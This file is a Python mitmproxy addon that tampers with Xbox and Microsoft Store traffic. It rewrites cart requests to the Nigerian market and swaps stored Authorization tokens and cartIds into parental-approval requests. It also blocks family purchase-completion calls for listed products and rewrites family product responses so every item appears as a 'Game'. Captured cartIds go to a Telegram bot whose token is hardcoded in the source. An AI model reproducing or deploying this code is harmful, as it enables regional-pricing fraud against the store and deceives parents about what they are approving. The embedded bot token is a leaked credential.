Files
Xbox-Mitm-Proxy/mitmproxy/addons/mitm_xbox_addon.py
2026-04-23 17:22:20 +08:00

732 lines
26 KiB
Python
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
# -*- coding: utf-8 -*-
from mitmproxy import http, ctx
import json, re, os, time, uuid, ssl
from urllib import request as urlrequest
from urllib.parse import urlparse, parse_qs, unquote, urlencode, urlunparse
# =========================
# Telegram push configuration
# =========================
# SECURITY: a bot token is a credential. The literal below is committed in
# source; it should be rotated and supplied through the environment instead.
# The literals are kept only as fallbacks so existing deployments that do not
# set the variables keep behaving exactly as before.
TELEGRAM_BOT_TOKEN = os.environ.get(
    "TELEGRAM_BOT_TOKEN", "8293676109:AAG3f6GnZNxJiwxwyGh_OtTU4wGn6-ypg_4"
)
# Chat that receives the notifications (the operator's own user ID).
TELEGRAM_CHAT_ID = os.environ.get("TELEGRAM_CHAT_ID", "1732587552")
TELEGRAM_API_BASE = "https://api.telegram.org"
def _tg_send(text: str):
    """Push one message to the configured Telegram chat.

    The message is sent with ``disable_notification=False`` so it arrives as a
    normal (non-silent) notification.  Any failure is only logged; it never
    propagates into the calling mitmproxy hook.

    Args:
        text: Message body; sent with ``parse_mode="HTML"``.
    """
    try:
        message = {
            "chat_id": TELEGRAM_CHAT_ID,
            "text": text,
            "parse_mode": "HTML",  # allows simple bold / emoji markup
            "disable_web_page_preview": True,
            "disable_notification": False,  # not silent: try to trigger a pop-up
        }
        encoded = json.dumps(message, ensure_ascii=False).encode("utf-8")
        endpoint = f"{TELEGRAM_API_BASE}/bot{TELEGRAM_BOT_TOKEN}/sendMessage"
        post = urlrequest.Request(endpoint, data=encoded, method="POST")
        post.add_header("Content-Type", "application/json")
        # Sent over HTTPS with default certificate verification.
        tls = ssl.create_default_context()
        with urlrequest.urlopen(post, context=tls, timeout=10) as reply:
            # Drain the reply so the connection is not left hanging.
            reply.read()
        ctx.log.info("[tg] sent notification ok")
    except Exception as ex:
        ctx.log.warn(f"[tg] send failed: {ex}")
# =========================
# State persistence (state.json)
# =========================
# Candidate locations for the state file, tried in order; the last entry is
# a state.json next to this module.
DEFAULT_STATE_PATHS = [
    "/home/mitmproxy/.mitmproxy/state.json",
    "/opt/mitmproxy/state.json",
    "/data/mitmproxy/state.json",
    os.path.join(os.path.dirname(__file__), "state.json"),
]
def _pick_state_path():
for p in DEFAULT_STATE_PATHS:
d = os.path.dirname(p)
try:
if d and not os.path.exists(d):
os.makedirs(d, exist_ok=True)
return p
except Exception:
continue
return "state.json"
# Resolved once at import time; every state read/write below uses this path.
STATE_PATH = _pick_state_path()
def _load_state():
    """Read the persisted state dictionary from ``STATE_PATH``.

    Returns:
        dict: the decoded JSON object, or an empty dict when the file is
        missing, unreadable, not valid JSON, or when its top-level value is
        not a JSON object.
    """
    try:
        with open(STATE_PATH, "r", encoding="utf-8") as f:
            loaded = json.load(f)
    except (OSError, ValueError):
        # Missing/unreadable file or malformed JSON: start from empty state.
        return {}
    # getv()/setv() use .get() and item assignment on the result, so a file
    # holding e.g. a list or a string must not be handed back as-is.
    return loaded if isinstance(loaded, dict) else {}
def _save_state(st):
    """Persist *st* as pretty-printed JSON at ``STATE_PATH``.

    The data is written to a sibling ``.tmp`` file first and then moved over
    the real file with ``os.replace``, so readers never see a half-written
    state file.
    """
    staging = STATE_PATH + ".tmp"
    with open(staging, "w", encoding="utf-8") as handle:
        json.dump(st, handle, ensure_ascii=False, indent=2, sort_keys=True)
    os.replace(staging, STATE_PATH)
def getv(key, default=""):
    """Return the persisted value stored under *key*, or *default* if absent.

    The state file is re-read on every call.
    """
    return _load_state().get(key, default)
def setv(key, value):
    """Store *value* under *key* in the persisted state.

    Performs a full load / modify / save cycle of the state file.
    """
    snapshot = _load_state()
    snapshot[key] = value
    _save_state(snapshot)
# =========================
# Triple storage (ProductId, SkuId, AvailabilityId)
# =========================
# State key holding the captured triples as a list of dicts.
_PRODUCTS_KEY = "__xbox_products__" # list[ {ProductId,SkuId,AvailabilityId} ]
# State key holding the same triples flattened into one string.
_LISTSTR_KEY = "XboxProductList" # "product1=pid|sku|aid;product2=..."
def _get_products():
    """Return the stored product triples as a list of clean dicts.

    Each returned dict has exactly the keys ``ProductId``, ``SkuId`` and
    ``AvailabilityId`` with stripped string values.  Stored entries that are
    malformed or have any empty field are dropped; a stored value that is not
    a list yields ``[]``.
    """
    stored = getv(_PRODUCTS_KEY, [])
    if not isinstance(stored, list):
        return []
    fields = ("ProductId", "SkuId", "AvailabilityId")
    valid = []
    for entry in stored:
        try:
            cleaned = {name: str(entry.get(name, "")).strip() for name in fields}
        except Exception:
            # Entry is not dict-like (or not stringifiable): skip it.
            continue
        if all(cleaned.values()):
            valid.append(cleaned)
    return valid
def _save_products(lst):
    """Persist the product list and notify when it changed.

    Steps:
      - de-duplicate *lst* (first occurrence of each triple wins, order kept)
      - write it back to the state file under ``__xbox_products__`` and, as a
        flattened string, under ``XboxProductList``
      - send a Telegram message if the flattened string differs from the one
        stored before this call
    """
    # Previous flattened list, captured first so the change can be detected.
    old_list_str = getv(_LISTSTR_KEY, "")

    # De-duplicate; setdefault keeps the first item seen for each key.
    first_seen = {}
    for it in lst:
        first_seen.setdefault(
            f"{it['ProductId']}||{it['SkuId']}||{it['AvailabilityId']}", it
        )
    uniq = list(first_seen.values())
    setv(_PRODUCTS_KEY, uniq)

    # Build and store the matching XboxProductList string.
    new_list_str = ";".join(
        f"product{i}={it['ProductId']}|{it['SkuId']}|{it['AvailabilityId']}"
        for i, it in enumerate(uniq, 1)
    )
    setv(_LISTSTR_KEY, new_list_str)

    # Notify only when the flattened list actually changed.
    if new_list_str == old_list_str:
        return
    count_now = len(uniq)
    _tg_send(f"🔔 XboxProductList 更新\n当前产品数: {count_now}")
def _add_product(pid, sid, aid):
    """Append one (ProductId, SkuId, AvailabilityId) triple to the stored list.

    Returns:
        bool: ``True`` if the triple was added; ``False`` if any part is empty
        or the triple is already stored.
    """
    if not pid or not sid or not aid:
        return False
    known = _get_products()
    key = f"{pid}||{sid}||{aid}"
    for row in known:
        if "||".join((row["ProductId"], row["SkuId"], row["AvailabilityId"])) == key:
            return False
    known.append({"ProductId": pid, "SkuId": sid, "AvailabilityId": aid})
    _save_products(known)
    return True
# =========================
# HTTP JSON helper
# =========================
def _json_response(flow: http.HTTPFlow, data: dict, status: int = 200):
    """Answer *flow* locally with *data* serialised as indented UTF-8 JSON.

    Args:
        flow: The flow whose ``response`` is replaced.
        data: JSON-serialisable payload.
        status: HTTP status code of the synthetic response.
    """
    headers = {"Content-Type": "application/json; charset=utf-8"}
    rendered = json.dumps(data, ensure_ascii=False, indent=2)
    flow.response = http.Response.make(status, rendered.encode("utf-8"), headers)
# =========================
# 抽三元组的递归解析
# =========================
def _extract_triples_from_json_like(text: str):
out = set()
if not text:
return out
data = None
try:
data = json.loads(text)
except Exception:
# 某些接口会返回 ")]}',\n{json...}" 之类,尝试抓第一个 {...} 或 [...]
m = re.search(r"(\{[\s\S]*\}|\[[\s\S]*\])", text)
if m:
try:
data = json.loads(m.group(1))
except Exception:
pass
if data is None:
return out
def is_obj(v):
return isinstance(v, dict)
def visit(node):
if isinstance(node, list):
for v in node:
visit(v)
return
if not is_obj(node):
return
at = node.get("actionType")
if isinstance(at, str) and at.lower() == "cart":
args = node.get("actionArguments", {})
if is_obj(args):
p = str(args.get("ProductId", "")).strip()
s = str(args.get("SkuId", "")).strip()
a = str(args.get("AvailabilityId", "")).strip()
if p and s and a:
out.add((p, s, a))
for v in node.values():
visit(v)
visit(data)
return out
# =========================
# PUT /cart/loadCart helper (add to cart)
# =========================
# User-Agent header value sent with the cart request.
UA = (
    "Mozilla/5.0 (iPhone; CPU iPhone OS 18_3_1 like Mac OS X) "
    "AppleWebKit/605.1.15 (KHTML, like Gecko) EdgiOS/133.0.3065.54 "
    "Version/18.0 Mobile/15E148 Safari/604.1"
)
# Endpoint that receives the loadCart PUT.
CART_API_URL = (
    "https://cart.production.store-web.dynamics.com/"
    "cart/v1.0/cart/loadCart?cartType=consumer&appId=StoreWeb"
)
def _cart_put_single(muid: str, ms_cv: str, pid: str, sid: str, aid: str, x_vec: str = ""):
    """Send one loadCart PUT that adds a single product triple to the cart.

    Args:
        muid: Value for the ``x-authorization-muid`` header.
        ms_cv: Value for the ``ms-cv`` header.
        pid: ProductId to add.
        sid: SkuId to add.
        aid: AvailabilityId to add.
        x_vec: Optional ``x-ms-vector-id`` header value; omitted when empty.

    Returns:
        tuple[int, bool, bytes]: ``(status, ok, body)``.  ``status`` is the
        HTTP status code (also for 4xx/5xx answers), or ``0`` when no HTTP
        answer was obtained at all.  ``ok`` is true only for 2xx.  ``body`` is
        at most the first 2048 bytes of the answer, or the error text.
    """
    # Local import: urlopen reports 4xx/5xx by raising HTTPError.
    from urllib.error import HTTPError

    payload = {
        "locale": "en-ng",
        "market": "NG",
        "catalogClientType": "storeWeb",
        "friendlyName": "cart-NG",
        "riskSessionId": str(uuid.uuid4()),
        "clientContext": {"client": "UniversalWebStore.Cart", "deviceType": "Pc"},
        "itemsToAdd": {
            "items": [
                {
                    "productId": pid,
                    "skuId": sid,
                    "availabilityId": aid,
                    "campaignId": "xboxcomct",
                    "quantity": 1,
                }
            ]
        },
    }
    data = json.dumps(payload, separators=(",", ":")).encode("utf-8")
    req = urlrequest.Request(CART_API_URL, data=data, method="PUT")
    req.add_header("content-type", "application/json")
    req.add_header("accept", "*/*")
    req.add_header("x-authorization-muid", muid or "")
    req.add_header("x-validation-field-1", "9pgbhbppjf2b")
    req.add_header("ms-cv", ms_cv or "")
    if x_vec:
        req.add_header("x-ms-vector-id", x_vec)
    req.add_header("accept-language", "en-US,en;q=0.9")
    # NOTE: urllib does not decode content encodings, so the returned body
    # bytes may be compressed when the server honours this header.
    req.add_header("accept-encoding", "gzip, deflate, br")
    req.add_header("sec-fetch-site", "cross-site")
    req.add_header("sec-fetch-mode", "cors")
    req.add_header("sec-fetch-dest", "empty")
    req.add_header("origin", "https://www.microsoft.com")
    req.add_header("referer", "https://www.microsoft.com/")
    req.add_header("user-agent", UA)
    try:
        ctx_ssl = ssl.create_default_context()
        with urlrequest.urlopen(req, context=ctx_ssl, timeout=20) as resp:
            return resp.status, (200 <= resp.status < 300), resp.read()[:2048]
    except HTTPError as ex:
        # The server answered with an error status: report the real code
        # instead of collapsing it to 0.
        try:
            detail = ex.read()[:2048]
        except Exception:
            detail = str(ex).encode("utf-8", errors="ignore")
        return ex.code, False, detail
    except Exception as ex:
        # Transport-level failure (DNS, TLS, timeout, ...): no status at all.
        return 0, False, str(ex).encode("utf-8", errors="ignore")
# =========================
# Main addon
# =========================
class MitmXboxAddonNoDashV4:
    """mitmproxy addon that rewrites selected Xbox / Microsoft Store traffic.

    Request side: issues region redirects, serves the local ``/__xbox/*``
    admin endpoints, patches ``RequestParentalApproval`` calls with the stored
    Authorization / cartId, answers family "complete" calls for
    ``TARGET_IDS`` with 403, rewrites cart request bodies to the NG market and
    captures cart headers / cartId into the state file.

    Response side: harvests cart triples from productActions responses and
    forces ``productKind`` to ``"Game"`` on the family product endpoint.
    """

    # Product ids matched (case-insensitively, as substrings of the request
    # body) by the family "complete" block in request().
    TARGET_IDS = [
        "9PNTSH5SKCL5",
        "9nfmccp0pm67",
        "9npbvj8lwsvn",
        "9pcgszz8zpq2",
        "9P54FF0VQD7R",
        "9NCJZN3LBD3P",
    ]
    # Splits "/<ll-cc>/<rest>" into the region and the remaining path.
    RX_XBOX_PATH = re.compile(r"^/([A-Za-z]{2}-[A-Za-z]{2})(/.*)$")

    def load(self, loader):
        """Log the resolved state-file path when the addon is loaded."""
        ctx.log.info(f"[xbox-nodash-v4] State path: {STATE_PATH}")

    # -----------------
    # Local admin endpoints /__xbox/*
    # -----------------
    def _normalize_seg(self, raw_path: str):
        """Split an admin path into its raw and normalised action segment.

        Returns ``("", "")`` unless *raw_path* starts with ``/__xbox/``
        (case-insensitive).  Otherwise returns ``(rawseg, normseg)``:
        ``rawseg`` is the text after the prefix without query string and
        surrounding slashes; ``normseg`` is ``rawseg`` lower-cased with every
        character outside ``a-z0-9`` removed.
        """
        if not raw_path or not raw_path.lower().startswith("/__xbox/"):
            return "", ""
        seg = raw_path[len("/__xbox/") :].split("?")[0]
        rawseg = seg.strip("/")
        normseg = re.sub(r"[^a-z0-9]", "", rawseg.lower())
        return rawseg, normseg

    def _handle_admin(self, flow: http.HTTPFlow):
        """Serve the ``/__xbox/<action>`` admin endpoints.

        Supported actions: ``check``, ``viewproducts``, ``clearproducts`` and
        ``addtocart``; any other non-empty action gets a 404 JSON answer.

        NOTE(review): only the path is inspected, not the host, so any proxied
        request whose path starts with ``/__xbox/`` reaches these endpoints —
        confirm this exposure is intended.

        Returns:
            bool: ``True`` when a response was set on *flow*, ``False`` when
            the path is not an admin path.
        """
        path = flow.request.path or "/"
        rawseg, seg = self._normalize_seg(path)
        if not seg:
            return False

        # /__xbox/check
        if seg == "check":
            keys = [
                "cart-x-authorization-muid",
                "cart-ms-cv",
                "cart-x-ms-vector-id",
                "authorization",
                "cartId",
            ]
            # The cart header values live under a "fiddler.custom." prefix;
            # authorization and cartId are stored under their bare names.
            state = {
                k: getv("fiddler.custom." + k, "")
                if k not in ("authorization", "cartId")
                else getv(k, "")
                for k in keys
            }
            prods = _get_products()
            _json_response(
                flow,
                {
                    "ok": True,
                    "state": state,
                    "products_count": len(prods),
                    "XboxProductList": getv(_LISTSTR_KEY, ""),
                },
            )
            return True

        # /__xbox/viewproducts
        if seg == "viewproducts":
            prods = _get_products()
            _json_response(
                flow,
                {
                    "ok": True,
                    "count": len(prods),
                    "products": prods,
                    "XboxProductList": getv(_LISTSTR_KEY, ""),
                },
            )
            return True

        # /__xbox/clearproducts
        if seg == "clearproducts":
            # _save_products also sends the Telegram notice (product count 0)
            # when the stored list was not already empty.
            _save_products([])
            _json_response(flow, {"ok": True, "message": "cleared"})
            return True

        # /__xbox/addtocart
        if seg == "addtocart":
            prods = _get_products()
            if not prods:
                _json_response(
                    flow, {"ok": False, "error": "no products captured"}, 400
                )
                return True
            muid = getv("fiddler.custom.cart-x-authorization-muid", "")
            ms_cv = getv("fiddler.custom.cart-ms-cv", "")
            x_vec = getv("fiddler.custom.cart-x-ms-vector-id", "")
            if not muid or not ms_cv:
                _json_response(
                    flow,
                    {
                        "ok": False,
                        "error": "missing cart-x-authorization-muid / cart-ms-cv",
                    },
                    400,
                )
                return True
            successes, failures = [], []
            remaining = list(prods)
            for item in prods:
                pid = item["ProductId"]
                sid = item["SkuId"]
                aid = item["AvailabilityId"]
                id_triple = f"{pid}/{sid}/{aid}"
                code, ok, _ = _cart_put_single(muid, ms_cv, pid, sid, aid, x_vec)
                if ok:
                    successes.append({"triple": id_triple, "status": code})
                    # Drop the triple that was just added from `remaining`.
                    remaining = [
                        x
                        for x in remaining
                        if not (
                            x["ProductId"] == pid
                            and x["SkuId"] == sid
                            and x["AvailabilityId"] == aid
                        )
                    ]
                else:
                    failures.append({"triple": id_triple, "status": code or "ERR"})
                # Short pause between consecutive cart calls.
                time.sleep(0.15)
            # Persist what is left (failed items are kept for a later retry);
            # this goes through _save_products and its notification logic.
            _save_products(remaining)
            _json_response(
                flow,
                {
                    "ok": True,
                    "tried": len(prods),
                    "success": len(successes),
                    "failed": len(failures),
                    "failures": failures,
                    "remaining": len(remaining),
                },
            )
            return True

        _json_response(
            flow,
            {
                "ok": False,
                "error": "unknown admin action",
                "seen_seg": seg,
                "raw_path": path,
                "rawseg": rawseg,
            },
            404,
        )
        return True

    # -----------------
    # Automatic 302 redirect rules
    # -----------------
    def _maybe_redirect(self, flow: http.HTTPFlow):
        """Answer *flow* with a 302 when one of the redirect rules applies.

        Rules, in order:
          0. ``microsoft.com/en-us/store/...<12 alnum chars>`` ->
             ``https://www.xbox.com/en-us/games/store/corehalo/<id>``
          1. ``www.xbox.com/<region>/...`` with a region other than
             ``es-ar`` / ``en-us`` -> same path under ``en-us``
          2. ``xboxfan.com/goto?region=xx`` -> ``region=en-us``
          3. ``app.corehalo.com/ms/link/go?r=xx`` -> ``r=en-us``

        Returns:
            bool: ``True`` when a redirect response was set.
        """
        fullurl = (flow.request.pretty_url or "").strip()
        if not fullurl:
            return False

        # (0) Microsoft Store -> Xbox corehalo/<id>
        # NOTE(review): the pattern takes the first run of 12 alphanumerics
        # that is followed by / ? # or end-of-URL, so a 12-letter path word
        # would match as well — confirm this is acceptable.
        try:
            m_ms = re.search(
                r"(?i)^https?://(?:www\.)?microsoft\.com/en-us/store/.*?([A-Za-z0-9]{12})(?:[\/?#]|$)",
                fullurl,
            )
            if m_ms:
                game_id = m_ms.group(1)
                new_url = "https://www.xbox.com/en-us/games/store/corehalo/" + game_id
                ctx.log.info(f"[xbox-nodash-v4] Redirect microsoft.com -> {new_url}")
                html_body = (
                    "<html><head><meta http-equiv='refresh' content='0;url="
                    + new_url
                    + "'></head><body>Redirecting to "
                    + new_url
                    + "</body></html>"
                ).encode("utf-8", errors="ignore")
                flow.response = http.Response.make(
                    302,
                    html_body,
                    {
                        "Location": new_url,
                        "Content-Type": "text/html; charset=UTF-8",
                    },
                )
                return True
        except Exception as e:
            ctx.log.warn(f"[xbox-nodash-v4] ms store redirect error: {e}")

        # Continue with the remaining redirect rules.
        parsed = urlparse(fullurl)
        host = parsed.hostname or ""
        path = parsed.path or ""
        query = parsed.query or ""
        qd = parse_qs(query, keep_blank_values=True)

        # (1) xbox.com: force the region segment to en-us
        if host.lower() == "www.xbox.com":
            m = self.RX_XBOX_PATH.match(path)
            if m:
                region = m.group(1)
                suffix = m.group(2) or "/"
                if region.lower() not in {"es-ar", "en-us"}:
                    new = f"https://www.xbox.com/en-us{suffix}"
                    ctx.log.info(f"[xbox-nodash-v4] Redirect xbox.com {fullurl} -> {new}")
                    flow.response = http.Response.make(302, b"", {"Location": new})
                    return True

        # (2) xboxfan.com/goto?region=xx -> en-us
        if host.lower() == "xboxfan.com" and path.lower().startswith("/goto"):
            region_vals = qd.get("region", [])
            if region_vals and region_vals[0].lower() not in {"es-ar", "en-us"}:
                qd["region"] = ["en-us"]
                new_q = urlencode(qd, doseq=True)
                new = urlunparse(("https", host, path, "", new_q, ""))
                ctx.log.info(f"[xbox-nodash-v4] Redirect xboxfan {fullurl} -> {new}")
                flow.response = http.Response.make(302, b"", {"Location": new})
                return True

        # (3) app.corehalo.com/ms/link/go?r=xx -> en-us
        if host.lower() == "app.corehalo.com" and path.lower().startswith("/ms/link/go"):
            r_vals = qd.get("r", [])
            if r_vals and r_vals[0].lower() not in {"es-ar", "en-us"}:
                qd["r"] = ["en-us"]
                new_q = urlencode(qd, doseq=True)
                new = urlunparse(("https", host, path, "", new_q, ""))
                ctx.log.info(f"[xbox-nodash-v4] Redirect corehalo {fullurl} -> {new}")
                flow.response = http.Response.make(302, b"", {"Location": new})
                return True

        return False

    # -----------------
    # Cart body normalisation (used by the request hook)
    # -----------------
    def _normalize_cart_body(self, flow: http.HTTPFlow):
        """Rewrite market / locale / friendlyName in a cart request body.

        The body is edited as JSON when it parses; otherwise a regex fallback
        is applied to the raw text.  Values that already target AR / es-ar /
        cart-AR are left alone.  An empty body is left untouched.  Failures
        are logged and never raised.
        """
        try:
            txt = flow.request.get_text() or ""
            if not txt.strip():
                # Nothing to normalise.  This only leaves the helper, so the
                # capture steps in request() still run for this flow.
                return
            modified = False
            try:
                data = json.loads(txt)
                mk = data.get("market")
                lc = data.get("locale")
                fn = data.get("friendlyName")
                if mk and mk.upper() != "AR":
                    data["market"] = "NG"
                    modified = True
                if lc and lc.lower() != "es-ar":
                    data["locale"] = "en-ng"
                    modified = True
                if fn and fn != "cart-AR":
                    data["friendlyName"] = "cart-NG"
                    modified = True
                if modified:
                    flow.request.set_text(json.dumps(data, ensure_ascii=False))
                    ctx.log.info("[xbox-nodash-v4] cart body normalized to NG")
            except Exception:
                # Not a JSON object (or unexpected value types): patch the
                # raw text instead.
                # NOTE(review): this path writes "en-NG" while the JSON path
                # writes "en-ng" — confirm whether the casing matters.
                new = re.sub(r'"market"\s*:\s*"(?!ar|AR)\w{2}"', r'"market":"NG"', txt)
                new = re.sub(r'"locale"\s*:\s*"(?!es-ar|es-AR)[\w-]+"', r'"locale":"en-NG"', new)
                new = re.sub(r'"friendlyName"\s*:\s*"(?!cart-AR)cart-\w{2}"', r'"friendlyName":"cart-NG"', new)
                if new != txt:
                    flow.request.set_text(new)
                    ctx.log.info("[xbox-nodash-v4] cart body normalized by regex")
        except Exception as ex:
            ctx.log.warn(f"[xbox-nodash-v4] cart normalization failed: {ex}")

    # -----------------
    # request hook
    # -----------------
    def request(self, flow: http.HTTPFlow):
        """Apply all request-side rules to *flow*.

        Order: redirects, admin endpoints, RequestParentalApproval patching,
        family "complete" blocking, cart body normalisation, then capture of
        eligibilityCheck (Authorization / cartId) and loadCart headers.
        """
        # Redirect rules run first.
        try:
            if self._maybe_redirect(flow):
                return
        except Exception as e:
            ctx.log.warn(f"[xbox-nodash-v4] redirect check error: {e}")

        # Admin endpoints.
        if self._handle_admin(flow):
            return

        # Patch RequestParentalApproval: only Authorization and cartId change.
        if (
            flow.request.host == "buynow.production.store-web.dynamics.com"
            and flow.request.method == "POST"
            and "/v1.0/Cart/RequestParentalApproval" in flow.request.path
        ):
            cart_id_stored = getv("cartId", "")
            auth_stored = getv("authorization", "")
            if not cart_id_stored or not auth_stored:
                ctx.log.error("[xbox-nodash-v4] 缺少存储的 cartId 或 authorization!")
                return
            # Overwrite the Authorization header.
            flow.request.headers["Authorization"] = auth_stored
            # Overwrite cartId inside the request body.
            try:
                body = flow.request.get_text() or ""
                if body:
                    # A callable replacement is inserted verbatim; a plain
                    # replacement string would have its backslashes parsed as
                    # regex escapes.  json.dumps also escapes quotes so the
                    # body stays valid JSON.
                    replacement = '"cartId":' + json.dumps(str(cart_id_stored))
                    new_body = re.sub(
                        r'"cartId"\s*:\s*"[^"]*"',
                        lambda _m: replacement,
                        body,
                    )
                    if new_body != body:
                        flow.request.set_text(new_body)
                        ctx.log.info("[xbox-nodash-v4] 替换 cartId")
                    else:
                        ctx.log.warn("[xbox-nodash-v4] 未发现 cartId 字段,仅替换 Authorization")
            except Exception as ex:
                ctx.log.warn(f"[xbox-nodash-v4] 替换 cartId 失败: {ex}")

        host = flow.request.host or ""
        path = flow.request.path or ""
        fullurl = flow.request.pretty_url or ""

        # Block family "complete" requests that mention a target product id.
        if (
            host == "account.microsoft.com"
            and flow.request.method == "POST"
            and path.startswith("/family/api/buy/requests/complete")
        ):
            body_low = (flow.request.get_text() or "").lower()
            for tid in self.TARGET_IDS:
                if tid.lower() in body_low:
                    flow.response = http.Response.make(
                        403,
                        b"Blocked by mitmproxy rule",
                        {"Content-Type": "text/plain; charset=utf-8"},
                    )
                    ctx.log.info(f"[xbox-nodash-v4] Blocked family complete for productId: {tid}")
                    return

        # Normalise cart bodies (force NG / en-ng / cart-NG).
        if host.endswith("store-web.dynamics.com") and "/v1.0/cart" in path:
            self._normalize_cart_body(flow)

        # eligibilityCheck: capture Authorization and cartId.
        if (
            flow.request.method.upper() == "PUT"
            and "eligibilitycheck" in path.lower()
            and "cart.production.store-web.dynamics.com" in host
        ):
            # The Authorization header is stored as-is.
            auth = flow.request.headers.get("Authorization", "")
            if auth:
                setv("authorization", auth)
            # cartId comes from the query string.
            try:
                qs = parse_qs(urlparse(fullurl).query)
                cart_id = qs.get("cartId", [""])[0] or qs.get("cartid", [""])[0]
                if cart_id:
                    cart_id = unquote(cart_id)
                    old_cart = getv("cartId", "")
                    if cart_id != old_cart:
                        setv("cartId", cart_id)
                        # cartId changed -> push a notification.
                        _tg_send(f"🔔 cartId 更新:\n{cart_id}")
            except Exception:
                pass
            ctx.log.info("[xbox-nodash-v4] captured eligibilityCheck params")

        # loadCart: capture the cart request headers.
        if (
            flow.request.method.upper() == "PUT"
            and "/v1.0/cart/loadCart" in path
            and "cart.production.store-web.dynamics.com" in host
        ):
            for hk, sk in [
                ("X-Authorization-Muid", "fiddler.custom.cart-x-authorization-muid"),
                ("MS-CV", "fiddler.custom.cart-ms-cv"),
                ("X-MS-Vector-Id", "fiddler.custom.cart-x-ms-vector-id"),
            ]:
                val = flow.request.headers.get(hk)
                if val:
                    setv(sk, val)
            ctx.log.info("[xbox-nodash-v4] captured loadCart headers")

    # -----------------
    # response hook
    # -----------------
    def response(self, flow: http.HTTPFlow):
        """Apply the response-side rules to *flow*.

        1. For ``GET emerald.xboxservices.com/xboxcomfd/productactions/...``
           with ``locale=en-us`` in the URL, extract cart triples from the
           body and store the new ones.
        2. For ``https://account.microsoft.com/family/api/product?puid=...``,
           set ``productDocument.product.productKind`` to ``"Game"`` in the
           JSON body.
        """
        req, resp = flow.request, flow.response
        host = (req.host or "").lower()
        path = (req.path or "").lower()

        # productActions: extract triples and hand them to _add_product.
        try:
            if (
                req.method.upper() == "GET"
                and host == "emerald.xboxservices.com"
                and path.startswith("/xboxcomfd/productactions/")
            ):
                # Only the en-us locale is of interest.
                if "locale=en-us" in (req.pretty_url or "").lower():
                    txt = resp.get_text() or ""
                    triples = _extract_triples_from_json_like(txt)
                    if triples:
                        added_cnt = 0
                        for p, s, a in triples:
                            if _add_product(p, s, a):
                                added_cnt += 1
                        ctx.log.info(
                            f"[xbox-nodash-v4] productActions captured: +{added_cnt}, total={len(_get_products())}"
                        )
        except Exception as e:
            ctx.log.warn(f"[xbox-nodash-v4] capture triples error: {e}")

        # Family product endpoint: force productKind to "Game".
        try:
            fullurl = (req.pretty_url or "").strip()
            if fullurl.lower().startswith(
                "https://account.microsoft.com/family/api/product?puid="
            ):
                txt = ""
                try:
                    txt = resp.get_text()
                except Exception:
                    # Fall back to a lenient manual decode of the raw bytes.
                    try:
                        txt = resp.content.decode("utf-8", errors="replace")
                    except Exception:
                        txt = ""
                if not txt:
                    return
                try:
                    data = json.loads(txt)
                except Exception as ex:
                    ctx.log.warn(f"[xbox-nodash-v4] response body not JSON: {ex}")
                    return
                try:
                    # Create the nested containers when missing or mistyped.
                    if "productDocument" not in data or not isinstance(data["productDocument"], dict):
                        data["productDocument"] = {}
                    pd = data["productDocument"]
                    if "product" not in pd or not isinstance(pd["product"], dict):
                        pd["product"] = {}
                    pd["product"]["productKind"] = "Game"
                    resp.set_text(json.dumps(data, ensure_ascii=False))
                    ctx.log.info("[xbox-nodash-v4] Modified productKind -> Game for product endpoint")
                except Exception as ex:
                    ctx.log.warn(f"[xbox-nodash-v4] failed to set productKind: {ex}")
        except Exception as e:
            ctx.log.warn(f"[xbox-nodash-v4] unexpected in response hook: {e}")
# Module-level list of addon instances; holds the single addon defined above.
addons = [MitmXboxAddonNoDashV4()]